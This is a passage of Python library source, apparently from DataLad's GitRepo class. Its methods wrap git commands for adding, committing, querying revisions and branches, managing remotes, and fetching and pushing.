b['refname:strip=2'].endswith('/git-annex')\n for b in self.for_each_ref_(fields='refname:strip=2', pattern=['refs/heads', 'refs/remotes'])\n )\n\n @classmethod\n def get_toppath(cls, path: str, follow_up: bool = True, git_options: Optional[list[str]] = None) -> Optional[str]:\n \"\"\"Return top-level of a repository given the path.\n\n Parameters\n -----------\n follow_up : bool\n If path has symlinks -- they get resolved by git. 
If follow_up is\n True, we will follow original path up until we hit the same resolved\n path. If no such path found, resolved one would be returned.\n git_options: list of str\n options to be passed to the git rev-parse call\n\n Return None if no parent directory contains a git repository.\n \"\"\"\n cmd = ['git']\n if git_options:\n cmd.extend(git_options)\n cmd += [\"rev-parse\", \"--show-toplevel\"]\n try:\n out = GitWitlessRunner(cwd=path).run(\n cmd, protocol=StdOutErrCapture)\n assert isinstance(out, dict)\n toppath = out['stdout'].rstrip('\\n\\r')\n except CommandError:\n return None\n except OSError:\n toppath = GitRepo.get_toppath(dirname(path), follow_up=follow_up,\n git_options=git_options)\n\n # normalize the report, because, e.g. on windows it can come out\n # with improper directory separators (C:/Users/datalad)\n toppath = str(Path(toppath))\n\n if follow_up:\n path_ = path\n path_prev = \"\"\n while path_ and path_ != path_prev: # on top /.. = /\n if str(Path(path_).resolve()) == toppath:\n toppath = path_\n break\n path_prev = path_\n path_ = dirname(path_)\n\n return toppath\n\n @normalize_paths\n def add(self, files: list[str], git: bool = True, git_options: Optional[list[str]] = None, update: bool = False) -> list[GitAddOutput]:\n \"\"\"Adds file(s) to the repository.\n\n Parameters\n ----------\n files: list\n list of paths to add\n git: bool\n somewhat ugly construction to be compatible with AnnexRepo.add();\n has to be always true.\n update: bool\n --update option for git-add. From git's manpage:\n Update the index just where it already has an entry matching\n <pathspec>. This removes as well as modifies index entries to match\n the working tree, but adds no new files.\n\n If no <pathspec> is given when --update option is used, all tracked\n files in the entire working tree are updated (old versions of Git\n used to limit the update to the current directory and its\n subdirectories).\n\n Returns\n -------\n list\n Of status dicts.\n \"\"\"\n # under all circumstances call this class' add_ (otherwise\n # AnnexRepo.add would go into a loop\n return list(GitRepo.add_(self, files, git=git, git_options=git_options,\n update=update))\n\n def add_(self, files: list[str], git: bool = True, git_options: Optional[list[str]] = None, update: bool = False) -> Iterator[GitAddOutput]:\n \"\"\"Like `add`, but returns a generator\"\"\"\n # TODO: git_options is used as options for the git-add here,\n # instead of options to the git executable => rename for consistency\n\n if not git:\n lgr.warning(\n 'GitRepo.add() called with git=%s, this should not happen',\n git)\n git = True\n\n # there is no other way then to collect all files into a list\n # at this point, because we need to pass them at once to a single\n # `git add` call\n files = [_normalize_path(self.path, f) for f in ensure_list(files) if f]\n\n if not (files or git_options or update):\n # wondering why just a warning? 
in cmdline this is also not an error\n lgr.warning(\"add was called with empty file list and no options.\")\n return\n\n try:\n # without --verbose git 2.9.3 add does not return anything\n add_out = self._call_git(\n # Set annex.gitaddtoannex to prevent storing files in\n # annex with a v6+ annex repo.\n ['-c', 'annex.gitaddtoannex=false', 'add'] +\n ensure_list(git_options) +\n to_options(update=update) + ['--verbose'],\n files=files,\n pathspec_from_file=True,\n read_only=False,\n )\n # get all the entries\n for o in self._process_git_get_output(*add_out):\n yield o\n # Note: as opposed to git cmdline, force is True by default in\n # gitpython, which would lead to add things, that are\n # ignored or excluded otherwise\n # 2. Note: There is an issue with globbing (like adding '.'),\n # which apparently doesn't care for 'force' and therefore\n # adds '.git/...'. May be it's expanded at the wrong\n # point in time or sth. like that.\n # For now, use direct call to git add.\n #self.cmd_call_wrapper(self.repo.index.add, files, write=True,\n # force=False)\n # TODO: May be make use of 'fprogress'-option to indicate\n # progress\n # But then, we don't have it for git-annex add, anyway.\n #\n # TODO: Is write=True a reasonable way to do it?\n # May be should not write until success of operation is\n # confirmed?\n # What's best in case of a list of files?\n except OSError as e:\n lgr.error(\"add: %s\", e)\n raise\n\n # Make sure return value from GitRepo is consistent with AnnexRepo\n # currently simulating similar return value, assuming success\n # for all files:\n # TODO: Make return values consistent across both *Repo classes!\n return\n\n @staticmethod\n def _process_git_get_output(stdout: str | bytes, stderr: Any = None) -> list[GitAddOutput]:\n \"\"\"Given both outputs (stderr is ignored atm) of git add - process it\n\n Primarily to centralize handling in both indirect annex and direct\n modes when ran through proxy\n \"\"\"\n return [{'file': f, 'success': True}\n for f in re.findall(\"'(.*)'[\\n$]\", ensure_unicode(stdout))]\n\n @normalize_paths(match_return_type=False)\n def remove(self, files: list[str], recursive: bool = False, **kwargs: Option) -> list[str]:\n \"\"\"Remove files.\n\n Calls git-rm.\n\n Parameters\n ----------\n files: list of str\n list of paths to remove\n recursive: False\n whether to allow recursive removal from subdirectories\n kwargs:\n see `__init__`\n\n Returns\n -------\n [str]\n list of successfully removed files.\n \"\"\"\n if recursive:\n kwargs['r'] = True\n\n # the name is chosen badly, but the purpose is to make sure that\n # any pending operations actually manifest themselves in the Git repo\n # on disk (in case of an AnnexRepo, it could be pending batch\n # processes that need closing)\n self.precommit()\n\n # output per removed file is expected to be \"rm 'PATH'\":\n return [\n line.strip()[4:-1]\n for line in self.call_git_items_(\n ['rm'] + to_options(True, **kwargs), files=files, pathspec_from_file=True)\n ]\n\n def precommit(self) -> None:\n \"\"\"Perform pre-commit maintenance tasks\n \"\"\"\n # we used to clean up GitPython here\n pass\n\n @staticmethod\n def _get_prefixed_commit_msg(msg: Optional[str]) -> str:\n DATALAD_PREFIX = \"[DATALAD]\"\n return DATALAD_PREFIX if not msg else \"%s %s\" % (DATALAD_PREFIX, msg)\n\n def configure_fake_dates(self) -> None:\n \"\"\"Configure repository to use fake dates.\n \"\"\"\n lgr.debug(\"Enabling fake dates\")\n self.config.set(\"datalad.fake-dates\", \"true\")\n\n @property\n def 
fake_dates_enabled(self) -> bool:\n \"\"\"Is the repository configured to use fake dates?\n \"\"\"\n # this turned into a private property of the CoreGitRepo\n return self._fake_dates_enabled\n\n def add_fake_dates(self, env):\n # was renamed in CoreGitRepo\n return self.add_fake_dates_to_env(env)\n\n def commit(self, msg: Optional[str] = None,\n options: Optional[list[str]] = None, _datalad_msg: bool = False,\n careless: bool = True, files: Optional[list[str]] = None,\n date: Optional[str] = None, index_file: Optional[str] = None) -> None:\n \"\"\"Commit changes to git.\n\n Parameters\n ----------\n msg: str, optional\n commit-message\n options: list of str, optional\n cmdline options for git-commit\n _datalad_msg: bool, optional\n To signal that commit is automated commit by datalad, so\n it would carry the [DATALAD] prefix\n careless: bool, optional\n if False, raise when there's nothing actually committed;\n if True, don't care\n files: list of str, optional\n path(s) to commit\n date: str, optional\n Date in one of the formats git understands\n index_file: str, optional\n An alternative index to use\n \"\"\"\n\n self.precommit()\n\n # assemble commandline\n cmd = ['commit']\n options = ensure_list(options)\n\n if date:\n options += [\"--date\", date]\n\n orig_msg = msg\n if not msg:\n if '--amend' in options:\n if '--no-edit' not in options:\n # don't overwrite old commit message with our default\n # message by default, but re-use old one. In other words:\n # Make --no-edit the default:\n options += [\"--no-edit\"]\n else:\n msg = 'Recorded changes'\n _datalad_msg = True\n\n if _datalad_msg:\n msg = self._get_prefixed_commit_msg(msg)\n\n if msg:\n options += [\"-m\", msg]\n cmd.extend(options)\n\n # set up env for commit\n env = self.add_fake_dates(None) \\\n if self.fake_dates_enabled else os.environ.copy()\n if index_file:\n env['GIT_INDEX_FILE'] = index_file\n\n lgr.debug(\"Committing via direct call of git: %s\", cmd)\n\n prev_sha = self.get_hexsha()\n\n # Old code was doing clever --amend'ing of chunked series of commits manually\n # here, but with pathspec_from_file it is no longer needed.\n # store pre-commit state to be able to check if anything was committed\n try:\n # Note: call_git operates via joining call_git_items_ and that one wipes out\n # .stdout from exception and collects/repopulates stderr only. Let's use\n # _call_git which returns both outputs and collects/re-populates both stdout\n # **and** stderr\n _ = self._call_git(\n cmd,\n files=files,\n env=env,\n pathspec_from_file=True,\n )\n except CommandError as e:\n # real errors first\n if \"did not match any file(s) known to git\" in e.stderr:\n raise FileNotInRepositoryError(\n cmd=e.cmd,\n msg=\"File(s) unknown to git\",\n code=e.code,\n filename=linesep.join([\n l for l in e.stderr.splitlines()\n if l.startswith(\"error: pathspec\")\n ])\n )\n # behavior choices now\n elif not careless:\n # not willing to compromise at all\n raise\n elif 'nothing to commit' in e.stdout:\n lgr.debug(\"nothing to commit in %s. Ignored.\", self)\n elif 'no changes added to commit' in e.stdout or \\\n 'nothing added to commit' in e.stdout:\n lgr.debug(\"no changes added to commit in %s. Ignored.\", self)\n else:\n raise\n if orig_msg \\\n or '--dry-run' in cmd \\\n or prev_sha == self.get_hexsha() \\\n or ('--amend' in cmd and '--no-edit' in cmd) \\\n or (not is_interactive()) \\\n or self.config.obtain('datalad.save.no-message') != 'interactive':\n # we had a message given, or nothing was committed, or prev. 
commit\n # was amended, or we are not connected to a terminal, or no\n # interactive message input is desired:\n # we can go home\n return\n\n # handle interactive message entry by running another `git-commit`\n self._git_runner.run(\n self._git_cmd_prefix + cmd + ['--amend', '--edit'],\n protocol=NoCapture,\n stdin=None,\n env=env,\n )\n\n # TODO usage is only in the tests, consider making a test helper and\n # remove from GitRepo API\n def get_indexed_files(self) -> list[str]:\n \"\"\"Get a list of files in git's index\n\n Returns\n -------\n list\n list of paths rooting in git's base dir\n \"\"\"\n\n return [\n str(r.relative_to(self.pathobj))\n for r in self.get_content_info(\n paths=None, ref=None, untracked='no')\n ]\n\n def format_commit(self, fmt: str, commitish: Optional[str] = None) -> Optional[str]:\n \"\"\"Return `git show` output for `commitish`.\n\n Parameters\n ----------\n fmt : str\n A format string accepted by `git show`.\n commitish: str, optional\n Any commit identifier (defaults to \"HEAD\").\n\n Returns\n -------\n str or, if there are not commits yet, None.\n \"\"\"\n # use git-log and not git-show due to faster performance with\n # complex commits (e.g. octopus merges)\n # https://github.com/datalad/datalad/issues/4801\n cmd = ['log', '-1', '-z', '--format=' + fmt]\n if commitish is not None:\n cmd.append(commitish + \"^{commit}\")\n # make sure Git takes our argument as a revision\n cmd.append('--')\n try:\n stdout = self.call_git(\n cmd, expect_stderr=True, expect_fail=True,\n read_only=True)\n except CommandError as e:\n if 'bad revision' in e.stderr:\n raise ValueError(\"Unknown commit identifier: %s\" % commitish)\n elif 'does not have any commits yet' in e.stderr:\n return None\n else:\n raise e\n # This trailing null is coming from the -z above, which avoids the\n # newline that Git would append to the output. 
We could drop -z and\n # strip the newline directly, but then we'd have to worry about\n # compatibility across platforms.\n return stdout.rsplit(\"\\0\", 1)[0]\n\n def get_hexsha(self, commitish: Optional[str] = None, short: bool = False) -> Optional[str]:\n \"\"\"Return a hexsha for a given commitish.\n\n Parameters\n ----------\n commitish : str, optional\n Any identifier that refers to a commit (defaults to \"HEAD\").\n short : bool, optional\n Return the abbreviated form of the hexsha.\n\n Returns\n -------\n str or, if no commitish was given and there are no commits yet, None.\n\n Raises\n ------\n ValueError\n If a commitish was given, but no corresponding commit could be\n determined.\n \"\"\"\n # use --quiet because the 'Needed a single revision' error message\n # that is the result of running this in a repo with no commits\n # isn't useful to report\n cmd = ['rev-parse', '--quiet', '--verify', '{}^{{commit}}'.format(\n commitish if commitish else 'HEAD')\n ]\n if short:\n cmd.append('--short')\n try:\n return self.call_git_oneline(cmd, read_only=True)\n except CommandError as e:\n if commitish is None:\n return None\n raise ValueError(\"Unknown commit identifier: %s\" % commitish)\n\n @normalize_paths(match_return_type=False)\n def get_last_commit_hexsha(self, files: list[str]) -> Optional[str]:\n \"\"\"Return the hash of the last commit the modified any of the given\n paths\"\"\"\n try:\n commit = self.call_git(\n ['rev-list', '-n1', 'HEAD'],\n files=files,\n expect_fail=True,\n read_only=True,\n )\n commit = commit.strip()\n return commit if commit else None\n except CommandError:\n if self.get_hexsha() is None:\n # unborn branch, don't freak out\n return None\n raise\n\n def get_revisions(self, revrange: str | list[str] | None = None, fmt: str = \"%H\", options: Optional[list[str]] = None) -> list[str]:\n \"\"\"Return list of revisions in `revrange`.\n\n Parameters\n ----------\n revrange : str or list of str or None, optional\n Revisions or revision ranges to walk. If None, revision defaults to\n HEAD unless a revision-modifying option like `--all` or\n `--branches` is included in `options`.\n fmt : string, optional\n Format accepted by `--format` option of `git log`. This should not\n contain new lines because the output is split on new lines.\n options : list of str, optional\n Options to pass to `git log`. 
This should not include `--format`.\n\n Returns\n -------\n List of revisions (str), formatted according to `fmt`.\n \"\"\"\n if revrange is None:\n revrange = []\n elif isinstance(revrange, str):\n revrange = [revrange]\n\n cmd = [\"log\", \"--format={}\".format(fmt)]\n cmd.extend((options or []) + revrange + [\"--\"])\n try:\n stdout = self.call_git(cmd, expect_fail=True, read_only=True)\n except CommandError as e:\n if \"does not have any commits\" in e.stderr:\n return []\n raise\n return stdout.splitlines()\n\n def commit_exists(self, commitish: str) -> bool:\n \"\"\"Does `commitish` exist in the repo?\n\n Parameters\n ----------\n commitish : str\n A commit or an object that can be dereferenced to one.\n\n Returns\n -------\n bool\n \"\"\"\n # Note: The peeling operator \"^{commit}\" is required so that rev-parse\n # doesn't succeed if passed a full hexsha that is valid but doesn't\n # exist.\n return self.call_git_success(\n [\"rev-parse\", \"--verify\", commitish + \"^{commit}\"],\n read_only=True,\n )\n\n def get_merge_base(self, commitishes: str | list[str]) -> Optional[str]:\n \"\"\"Get a merge base hexsha\n\n Parameters\n ----------\n commitishes: str or list of str\n List of commitishes (branches, hexshas, etc) to determine the merge\n base of. If a single value provided, returns merge_base with the\n current branch.\n\n Returns\n -------\n str or None\n If no merge-base for given commits, or specified treeish doesn't\n exist, None returned\n \"\"\"\n if isinstance(commitishes, str):\n commitishes = [commitishes]\n if not commitishes:\n raise ValueError(\"Provide at least a single value\")\n elif len(commitishes) == 1:\n branch = self.get_active_branch()\n if branch is None:\n raise ValueError(\"Single commitish provided and no active branch\")\n commitishes = commitishes + [branch]\n\n try:\n base = self.call_git_oneline(['merge-base'] + commitishes,\n read_only=True)\n except CommandError as exc:\n if exc.code == 1 and not (exc.stdout or exc.stderr):\n # No merge base was found (unrelated commits).\n return None\n if \"fatal: Not a valid object name\" in exc.stderr:\n return None\n raise\n\n return base\n\n def is_ancestor(self, reva: str, revb: str) -> bool:\n \"\"\"Is `reva` an ancestor of `revb`?\n\n Parameters\n ----------\n reva, revb : str\n Revisions.\n\n Returns\n -------\n bool\n \"\"\"\n return self.call_git_success(\n [\"merge-base\", \"--is-ancestor\", reva, revb],\n read_only=True)\n\n def get_commit_date(self, branch: Optional[str] = None, date: str = 'authored') -> Optional[int]:\n \"\"\"Get the date stamp of the last commit (in a branch or head otherwise)\n\n Parameters\n ----------\n date: {'authored', 'committed'}\n Which date to return. \"authored\" will be the date shown by \"git show\"\n and the one possibly specified via --date to `git commit`\n\n Returns\n -------\n int or None\n None if no commit\n \"\"\"\n if date == 'committed':\n format = '%ct'\n elif date == 'authored':\n format = '%at'\n else:\n raise ValueError('unknow date type: {}'.format(date))\n d = self.format_commit(format, commitish=branch)\n return int(d) if d else None\n\n def get_active_branch(self) -> Optional[str]:\n \"\"\"Get the name of the active branch\n\n Returns\n -------\n str or None\n Returns None if there is no active branch, i.e. 
detached HEAD,\n and the branch name otherwise.\n \"\"\"\n try:\n out = self.call_git([\"symbolic-ref\", \"HEAD\"], expect_fail=True,\n read_only=True)\n except CommandError as e:\n if 'HEAD is not a symbolic ref' in e.stderr:\n lgr.debug(\"detached HEAD in %s\", self)\n return None\n else:\n raise e\n return out.strip()[11:] # strip refs/heads/\n\n def get_corresponding_branch(self, branch: Any = None) -> Optional[str]:\n \"\"\"Always returns None, a plain GitRepo has no managed branches\"\"\"\n return None\n\n def get_branches(self) -> list[str]:\n \"\"\"Get all branches of the repo.\n\n Returns\n -------\n [str]\n Names of all branches of this repository.\n \"\"\"\n\n return [\n b['refname:strip=2']\n for b in self.for_each_ref_(fields='refname:strip=2', pattern='refs/heads')\n ]\n\n def get_remote_branches(self) -> list[str]:\n \"\"\"Get all branches of all remotes of the repo.\n\n Returns\n -----------\n [str]\n Names of all remote branches.\n \"\"\"\n # TODO: Reconsider melting with get_branches()\n\n # TODO: treat entries like this: origin/HEAD -> origin/master'\n # currently this is done in collection\n\n return [\n b['refname:strip=2']\n for b in self.for_each_ref_(fields='refname:strip=2', pattern='refs/remotes')\n ]\n\n def get_remotes(self, with_urls_only: bool = False) -> list[str]:\n \"\"\"Get known remotes of the repository\n\n Parameters\n ----------\n with_urls_only : bool, optional\n return only remotes which have urls\n\n Returns\n -------\n remotes : list of str\n List of names of the remotes\n \"\"\"\n from datalad.utils import unique\n\n self.config.reload()\n remotes = unique([x[7:] for x in self.config.sections()\n if x.startswith(\"remote.\")])\n\n if with_urls_only:\n remotes = [\n r for r in remotes\n if self.config.get('remote.%s.url' % r)\n ]\n return remotes\n\n # TODO this is practically unused outside the tests, consider turning\n # into a test helper and trim from the API\n def get_files(self, branch: Optional[str] = None) -> list[str]:\n \"\"\"Get a list of files in git.\n\n Lists the files in the (remote) branch.\n\n Parameters\n ----------\n branch: str\n Name of the branch to query. 
Default: active branch.\n\n Returns\n -------\n [str]\n list of files.\n \"\"\"\n return [\n str(p.relative_to(self.pathobj))\n for p in self.get_content_info(\n paths=None, ref=branch, untracked='no')\n ]\n\n def add_remote(self, name: str, url: str, options: Optional[list[str]] = None) -> tuple[str, str]:\n \"\"\"Register remote pointing to a url\n \"\"\"\n cmd = ['remote', 'add']\n if options:\n cmd += options\n cmd += [name, url]\n\n # for historical reasons this method returns stdout and\n # stderr, keeping that for now\n result = self._call_git(cmd)\n self.config.reload()\n return result\n\n def remove_remote(self, name: str) -> None:\n \"\"\"Remove existing remote\n \"\"\"\n\n # TODO: testing and error handling!\n from .exceptions import RemoteNotAvailableError\n try:\n self.call_git(['remote', 'remove', name])\n except CommandError as e:\n if 'No such remote' in e.stderr:\n raise RemoteNotAvailableError(name,\n cmd=\"git remote remove\",\n msg=\"No such remote\",\n stdout=e.stdout,\n stderr=e.stderr)\n else:\n raise e\n\n # config.reload necessary, because the associated remote config\n # will vanish\n self.config.reload()\n return\n\n def _maybe_open_ssh_connection(self, remote: Optional[str], prefer_push: bool = True) -> None:\n \"\"\"Open connection if `remote` has an SSH URL.\n\n Doing so enables SSH caching, preventing datalad-sshrun subprocesses\n from opening (and then closing) their own.\n\n Parameters\n ----------\n remote : str\n prefer_push : bool, optional\n Use `remote.<remote>.pushurl` if there is one, falling back to\n `remote.<remote>.url`.\n \"\"\"\n if remote:\n url = None\n if prefer_push:\n url = self.get_remote_url(remote, push=True)\n url = url or self.get_remote_url(remote)\n if url and is_ssh(url):\n ssh_manager.get_connection(url).open()\n\n def update_remote(self, name: Optional[str] = None, verbose: bool = False) -> None:\n \"\"\"\n \"\"\"\n options = [\"-v\"] if verbose else []\n self._maybe_open_ssh_connection(name)\n namelst = [name] if name else []\n self.call_git(\n ['remote'] + namelst + ['update'] + options,\n expect_stderr=True\n )\n\n def fetch(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] = None,\n **kwargs: Option) -> list[FetchInfo]:\n \"\"\"Fetches changes from a remote (or all remotes).\n\n Parameters\n ----------\n remote : str, optional\n name of the remote to fetch from. If no remote is given and\n `all_` is not set, the tracking branch is fetched.\n refspec : str or list, optional\n refspec(s) to fetch.\n all_ : bool, optional\n fetch all remotes (and all of their branches).\n Fails if `remote` was given.\n git_options : list, optional\n Additional command line options for git-fetch.\n kwargs :\n Deprecated. 
GitPython-style keyword argument for git-fetch.\n Will be appended to any git_options.\n \"\"\"\n git_options = ensure_list(git_options)\n if kwargs:\n git_options.extend(to_options(True, **kwargs))\n return list(\n self.fetch_(\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options,\n )\n )\n\n def fetch_(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] = None) -> Iterator[FetchInfo]:\n \"\"\"Like `fetch`, but returns a generator\"\"\"\n yield from self._fetch_push_helper(\n base_cmd=self._git_cmd_prefix + ['fetch', '--verbose', '--progress'],\n action='fetch',\n urlvars=('remote.{}.url', 'remote.{}.url'),\n protocol=GitProgress,\n info_cls=FetchInfo,\n info_from='stderr',\n add_remote=False,\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options)\n\n def push(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_remotes: bool = False,\n all_: bool = False, git_options: Optional[list[str]] = None, **kwargs: Option) -> list[PushInfo]:\n \"\"\"Push changes to a remote (or all remotes).\n\n If remote and refspec are specified, and remote has\n `remote.{remote}.datalad-push-default-first` configuration variable\n set (e.g. by `create-sibling-github`), we will first push the first\n refspec separately to possibly ensure that the first refspec is chosen\n by remote as the \"default branch\".\n See https://github.com/datalad/datalad/issues/4997\n Upon successful push if this variable was set in the local git config,\n we unset it, so subsequent pushes would proceed normally.\n\n Parameters\n ----------\n remote : str, optional\n name of the remote to push to. If no remote is given and\n `all_` is not set, the tracking branch is pushed.\n refspec : str or list, optional\n refspec(s) to push.\n all_ : bool, optional\n push to all remotes. Fails if `remote` was given.\n git_options : list, optional\n Additional command line options for git-push.\n kwargs :\n Deprecated. 
GitPython-style keyword argument for git-push.\n Will be appended to any git_options.\n \"\"\"\n git_options = ensure_list(git_options)\n if kwargs:\n git_options.extend(to_options(True, **kwargs))\n if all_remotes:\n # be nice to the elderly\n all_ = True\n\n push_refspecs = [refspec]\n cfg = self.config # shortcut\n cfg_push_var = \"remote.{}.datalad-push-default-first\".format(remote)\n if remote and refspec and cfg.obtain(cfg_push_var, default=False, valtype=bool):\n refspec = ensure_list(refspec)\n lgr.debug(\"As indicated by %s pushing first refspec %s separately first\",\n cfg_push_var, refspec[0])\n push_refspecs = [[refspec[0]], refspec[1:]]\n\n push_res: list[PushInfo] = []\n for refspecs in push_refspecs:\n push_res.extend(\n self.push_(\n remote=remote,\n refspec=refspecs,\n all_=all_,\n git_options=git_options,\n )\n )\n # note: above push_ should raise exception if errors out\n if '--dry-run' not in git_options \\\n and cfg.get_from_source('local', cfg_push_var) is not None:\n lgr.debug(\"Removing %s variable from local git config after successful push\", cfg_push_var)\n cfg.unset(cfg_push_var, 'local')\n return push_res\n\n def push_(self, remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool = False, git_options: Optional[list[str]] =None) -> Iterator[PushInfo]:\n \"\"\"Like `push`, but returns a generator\"\"\"\n yield from self._fetch_push_helper(\n base_cmd=self._git_cmd_prefix + ['push', '--progress', '--porcelain'],\n action='push',\n urlvars=('remote.{}.pushurl', 'remote.{}.url'),\n protocol=StdOutCaptureWithGitProgress,\n info_cls=PushInfo,\n info_from='stdout',\n add_remote=True,\n remote=remote,\n refspec=refspec,\n all_=all_,\n git_options=git_options)\n\n def _fetch_push_helper(\n self,\n base_cmd: list[str], # arg list\n action: str, # label fetch|push\n urlvars: tuple[str, ...], # variables to query for URLs\n protocol: type[WitlessProtocol], # processor for output\n info_cls: type[InfoT], # Push|FetchInfo\n info_from: str, # stdout, stderr\n add_remote: bool, # whether to add a 'remote' field to the info dict\n remote: Optional[str] = None, refspec: str | list[str] | None = None, all_: bool =False, git_options: Optional[list[str]] = None) -> Iterator[InfoT]:\n\n git_options = ensure_list(git_options)\n\n cmd = base_cmd + git_options\n\n if remote is None:\n if refspec:\n # conflicts with using tracking branch or push all remotes\n # For now: Just fail.\n # TODO: May be check whether it fits to tracking branch\n raise ValueError(\n \"refspec specified without a remote. 
({})\".format(refspec))\n if all_:\n remotes_to_process = self.get_remotes(with_urls_only=True)\n else:\n # No explicit remote to fetch.\n # => get tracking branch:\n tb_remote, refspec = self.get_tracking_branch()\n if tb_remote is not None:\n remotes_to_process = [tb_remote]\n else:\n # No remote, no tracking branch\n # => fail\n raise ValueError(\n \"Neither a remote is specified to {} \"\n \"from nor a tracking branch is set up.\".format(action))\n else:\n if all_:\n raise ValueError(\n \"Option 'all_' conflicts with specified remote \"\n \"'{}'.\".format(remote))\n remotes_to_process = [remote]\n\n if refspec:\n # prep for appending to cmd\n refspec = ensure_list(refspec)\n\n # no need for progress report, when there is just one remote\n log_remote_progress = len(remotes_to_process) > 1\n if log_remote_progress:\n pbar_id = '{}remotes-{}'.format(action, id(self))\n log_progress(\n lgr.info,\n pbar_id,\n 'Start %sing remotes for %s', action, self,\n total=len(remotes_to_process),\n label=action.capitalize(),\n unit=' Remotes',\n )\n try:\n for remote in remotes_to_process:\n r_cmd = cmd + [remote]\n if refspec:\n r_cmd += refspec\n\n if log_remote_progress:\n log_progress(\n lgr.info,\n pbar_id,\n '{}ing remote %s'.format(action.capitalize()),\n remote,\n update=1,\n increment=True,\n )\n # best effort to enable SSH connection caching\n url = self.config.get(\n # make two attempts to get a URL\n urlvars[0].format(remote),\n self.config.get(\n urlvars[1].format(remote),\n None)\n )\n if url and is_ssh(url):\n ssh_manager.get_connection(url).open()\n try:\n out = self._git_runner.run(\n r_cmd,\n protocol=protocol,\n )\n output = out[info_from] or ''\n except CommandError as e:\n output = None\n # intercept some errors that we express as an error report\n # in the info dicts\n if re.match(\n '.*^error: failed to (push|fetch) some refs',\n e.stderr,\n re.DOTALL | re.MULTILINE):\n output = getattr(e, info_from)\n hints = ' '.join([l[6:] for l in e.stderr.splitlines()\n if l.startswith('hint: ')])\n if output is None:\n output = ''\n if not output:\n raise\n\n assert isinstance(output, str)\n for line in output.splitlines():\n try:\n # push info doesn't identify a remote, add it here\n pi = info_cls._from_line(line)\n if add_remote:\n pi['remote'] = remote\n # There were errors, but Git provided hints\n if 'error' in pi['operations']:\n pi['hints'] = hints or None\n yield pi\n except Exception:\n # it is not progress and no push info\n # don't hide it completely\n lgr.debug('git-%s reported: %s', action, line)\n finally:\n if log_remote_progress:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished %sing remotes for %s', action, self,\n )\n\n def get_remote_url(self, name: str, push: bool = False) -> Optional[str]:\n \"\"\"Get the url of a remote.\n\n Reads the configuration of remote `name` and returns its url or None,\n if there is no url configured.\n\n Parameters\n ----------\n name: str\n name of the remote\n push: bool\n if True, get the pushurl instead of the fetch url.\n \"\"\"\n\n var = 'remote.{0}.{1}'.format(name, 'pushurl' if push else 'url')\n return self.config.get(var, None)\n\n def set_remote_url(self, name: str, url: str, push: bool = False) -> None:\n \"\"\"Set the URL a remote is pointing to\n\n Sets the URL of the remote `name`. 
Requires the remote to already exist.\n\n Parameters\n ----------\n name: str\n name of the remote\n url: str\n push: bool\n if True, set the push URL, otherwise the fetch URL\n \"\"\"\n\n var = 'remote.{0}.{1}'.format(name, 'pushurl' if push else 'url')\n self.config.set(var, url, scope='local', reload=True)\n\n def get_branch_commits_(self, branch: Optional[str] = None, limit: Optional[str] = None, stop: Optional[str] = None) -> Iterator[str]:\n \"\"\"Return commit hexshas for a branch\n\n Parameters\n ----------\n branch: str, optional\n If not provided, assumes current branch\n limit: None | 'left-only', optional\n Limit which commits to report. If None -- all commits (merged or not),\n if 'left-only' -- only the commits from the left side of the tree upon\n merges\n stop: str, optional\n hexsha of the commit at which stop reporting (matched one is not\n reported either)\n\n Yields\n ------\n str\n \"\"\"\n cmd = ['rev-list']\n if limit == 'left-only':\n cmd.append('--left-only')\n if not branch:\n branch = self.get_active_branch()\n if branch is None:\n raise ValueError(\"Branch not provided and no active branch\")\n cmd.append(branch)\n # and trailing -- marker to make sure that Git never confused the branch\n # with a potentially existing directory of the same name\n cmd.append('--')\n for r in self.call_git_items_(cmd):\n if stop and stop == r:\n return\n yield r\n\n def checkout(self, name: str, options: Optional[list[str]] = None) -> None:\n \"\"\"\n \"\"\"\n # TODO: May be check for the need of -b options herein?\n cmd = ['checkout']\n if options:\n cmd += options\n cmd += [str(name)]\n\n self.call_git(cmd, expect_stderr=True)\n # checkout can change committed config, or create branch config\n self.config.reload()\n\n # TODO: Before implementing annex merge, find usages and check for a needed\n # change to call super().merge\n def merge(self, name: str, options: Optional[list[str]] = None, msg: Optional[str] = None, allow_unrelated: bool = False, **kwargs: Any) -> None:\n if options is None:\n options = []\n if msg:\n options = options + [\"-m\", msg]\n if allow_unrelated:\n options += ['--allow-unrelated-histories']\n self.call_git(\n ['merge'] + options + [name],\n **kwargs\n )\n\n def remove_branch(self, branch: str) -> None:\n self.call_git(['branch', '-D', branch])\n\n def cherry_pick(self, commit: str) -> None:\n \"\"\"Cherry pick `commit` to the current branch.\n\n Parameters\n ----------\n commit : str\n A single commit.\n \"\"\"\n self.call_git([\"cherry-pick\", commit])\n\n @property\n def dirty(self) -> bool:\n \"\"\"Is the repository dirty?\n\n Note: This provides a quick answer when you simply want to know if\n there are any untracked changes or modifications in this repository or\n its submodules. For finer-grained control and more detailed reporting,\n use status() instead.\n \"\"\"\n stdout = self.call_git(\n [\"status\", \"--porcelain\",\n # Ensure the result isn't influenced by status.showUntrackedFiles.\n \"--untracked-files=normal\",\n # Ensure the result isn't influenced by diff.ignoreSubmodules.\n \"--ignore-submodules=none\"])\n if bool(stdout.strip()):\n # The quick `git status`-based check can give a different answer\n # than `datalad status` for submodules on an adjusted branch.\n st = self.diffstatus(fr=\"HEAD\" if self.get_hexsha() else None,\n to=None, untracked=\"normal\")\n return any(r.get(\"state\") != \"clean\" for r in st.values())\n return False\n\n @property\n def untracked_files(self) -> list[str]:\n \"\"\"Legacy interface, do not use! 
